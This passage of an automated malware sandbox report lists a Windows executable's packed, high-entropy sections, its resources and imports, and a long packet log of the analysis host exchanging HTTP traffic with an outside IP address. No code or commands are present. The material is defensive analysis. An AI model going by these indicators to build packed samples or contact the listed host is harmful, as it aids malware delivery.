| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x40d000 | 0x25400 | 2678ed13b8096f728f96d78c3388c372 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x40e000 | 0x12168 | 0x9400 | ed97dec821d49e679673e5958968c338 | False | 0.9627586570945946 | data | 7.887337074005302 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x421000 | 0x1000 | 0x200 | de906030ab088402d586a76aa6666758 | False | 0.15234375 | data | 1.0884795995201089 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x422000 | 0x28b000 | 0x200 | 56befbbddf2663c6d5eca3d812e41495 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| lerqcswm | 0x6ad000 | 0x1a6000 | 0x1a5e00 | 82525416338df0e1ab56f377e92208f8 | False | 0.9845434027777777 | data | 7.941431801128011 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| gsvpblsk | 0x853000 | 0x1000 | 0x400 | 5549e3c01a5e2a3be1d1a9733f9ddabe | False | 0.7890625 | data | 6.117290181640375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x854000 | 0x3000 | 0x2200 | f817d0c44529368b6e411a8447409ea2 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_CURSOR | 0x40e730 | 0x130 | data | | | 1.0361842105263157 |
| RT_CURSOR | 0x40e860 | 0x25a8 | data | | | 1.0011410788381743 |
| RT_CURSOR | 0x410e08 | 0xea8 | data | | | 1.0029317697228144 |
| RT_ICON | 0x847eb8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Syriac | Syriac | 0.3648720682302772 |
| RT_ICON | 0x848d60 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Syriac | Syriac | 0.5063176895306859 |
| RT_ICON | 0x849608 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Syriac | Syriac | 0.5881336405529954 |
| RT_ICON | 0x849cd0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Syriac | Syriac | 0.619942196531792 |
| RT_ICON | 0x84a238 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Syriac | Syriac | 0.3574108818011257 |
| RT_ICON | 0x84b2e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Syriac | Syriac | 0.3536885245901639 |
| RT_ICON | 0x84bc68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Syriac | Syriac | 0.40425531914893614 |
| RT_ICON | 0x84c0d0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Syriac | Syriac | 0.7969083155650319 |
| RT_ICON | 0x84cf78 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Syriac | Syriac | 0.8032490974729242 |
| RT_ICON | 0x84d820 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Syriac | Syriac | 0.7350230414746544 |
| RT_ICON | 0x84dee8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Syriac | Syriac | 0.7774566473988439 |
| RT_ICON | 0x84e450 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Syriac | Syriac | 0.6827800829875519 |
| RT_ICON | 0x8509f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | Syriac | Syriac | 0.7293621013133208 |
| RT_ICON | 0x851aa0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | Syriac | Syriac | 0.7594262295081967 |
| RT_ICON | 0x852428 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Syriac | Syriac | 0.8111702127659575 |
| RT_DIALOG | 0x41c688 | 0x84 | empty | | | 0 |
| RT_STRING | 0x41c70c | 0x4be | empty | | | 0 |
| RT_STRING | 0x41cbcc | 0xc4 | empty | | | 0 |
| RT_STRING | 0x41cc90 | 0x732 | empty | | | 0 |
| RT_STRING | 0x41d3c4 | 0x7bc | empty | | | 0 |
| RT_STRING | 0x41db80 | 0x5f0 | empty | | | 0 |
| RT_STRING | 0x41e170 | 0x696 | empty | | | 0 |
| RT_STRING | 0x41e808 | 0x7c0 | empty | | | 0 |
| RT_STRING | 0x41efc8 | 0x76a | empty | | | 0 |
| RT_STRING | 0x41f734 | 0x610 | empty | | | 0 |
| RT_GROUP_CURSOR | 0x41fd44 | 0x22 | empty | | | 0 |
| RT_GROUP_CURSOR | 0x41fd68 | 0x14 | empty | | | 0 |
| RT_GROUP_ICON | 0x852890 | 0x76 | data | Syriac | Syriac | 0.6779661016949152 |
| RT_GROUP_ICON | 0x852906 | 0x68 | data | Syriac | Syriac | 0.7115384615384616 |
| RT_VERSION | 0x85296e | 0x1b8 | COM executable for DOS | | | 0.5704545454545454 |
| RT_MANIFEST | 0x852b26 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Language of compilation system | Country where language is spoken | Map |
| Syriac | Syriac | |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                          Dec 13, 2024 06:12:56.301060915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.301166058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.301166058 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.305003881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.305109024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.305126905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.305217028 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.313396931 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.313476086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.316473961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.316546917 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.316589117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.316649914 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.324886084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.324954987 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.325037956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.325104952 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.333278894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.333354950 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.333374977 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.333436966 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.341717958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.341850042 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.341854095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.342010975 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.350104094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.350220919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.350225925 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.350286961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.358566046 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.358624935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.358647108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.358680010 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.366936922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.367048979 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.367115974 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.367170095 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.375355959 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.375478029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.375565052 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.383774996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.383971930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.492959976 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.493074894 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.493141890 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.493303061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.495495081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.495598078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.495654106 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.495693922 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.500557899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.500638008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.500691891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.500756025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.505618095 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.505685091 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.505757093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.505817890 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.510490894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.510593891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.510610104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.511181116 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.515361071 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.515425920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.515465021 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.515530109 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.520235062 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.520308971 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.520340919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.520397902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.525109053 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.525187969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.525296926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.529966116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.530034065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.530083895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.530143023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.534852028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.534946918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.535032034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.539665937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.539781094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.539845943 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.544548035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.544620991 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.544692993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.544740915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.549412966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.549490929 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.549509048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.549560070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.554280996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.554377079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.554385900 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.554430962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.559159040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.559267998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.559339046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.564019918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.564122915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.564194918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.568867922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.568960905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.569022894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.569068909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.573756933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.573858976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.573899031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.573964119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.684950113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.685038090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.685038090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.685092926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.685998917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.686070919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.686132908 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.686192036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.689939022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.690013885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.690063953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.690124035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.693886042 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.693948030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.694031954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.694084883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.697868109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.697940111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.698012114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.698069096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.701653957 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.701729059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.701750994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.701817989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.705346107 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.705410004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.705454111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.705508947 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.709034920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.709100008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.709180117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.709240913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.712722063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.712785006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.712850094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.712905884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.716449022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.716512918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.716555119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.716612101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.720136881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.720201969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.720261097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.720318079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.723828077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.723889112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.723968983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.724025965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.727575064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.727638960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.727703094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.727762938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.731193066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.731260061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.731357098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.731416941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.734908104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.734972000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.735058069 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.735115051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.738610029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.738687038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.738742113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.738801003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.742343903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.742414951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.742491961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.742552042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.745975018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.746068954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.746088982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.746140003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.749660015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.749715090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.749747992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.749825001 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.753385067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.753444910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.753566980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.753622055 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.757172108 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.757225037 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.757333040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.757380009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.760891914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.760950089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.761286020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.761332989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.765042067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.765101910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.765566111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.765619993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.768661022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.768718004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.769017935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.769069910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.771878004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.771938086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.772016048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.772067070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.775587082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.775656939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.775737047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.775794029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.779419899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.779485941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.876931906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.877055883 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.877365112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.878323078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.878398895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.878920078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.879030943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.879095078 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.882057905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.882277966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.882361889 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.885209084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.885236979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.885281086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.885313988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.888267994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.888369083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.888453007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.891223907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.891309023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.891391993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.891450882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.894203901 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.894272089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.894314051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.894367933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.897097111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.897161007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.897495031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.897559881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.899949074 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.900068998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.900142908 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.902750969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.902808905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.902846098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.902890921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.905461073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.905514002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.905553102 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.905616045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.908157110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.908212900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.908242941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.908301115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.910856962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.910928965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353497982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353504896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353528023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353558064 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353631020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353682041 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353751898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353805065 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353811026 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353815079 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353847027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.353853941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.353893995 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.354074955 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.354126930 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.354249001 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.354299068 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.354358912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.354464054 CET4978680192.168.2.580.82.65.70
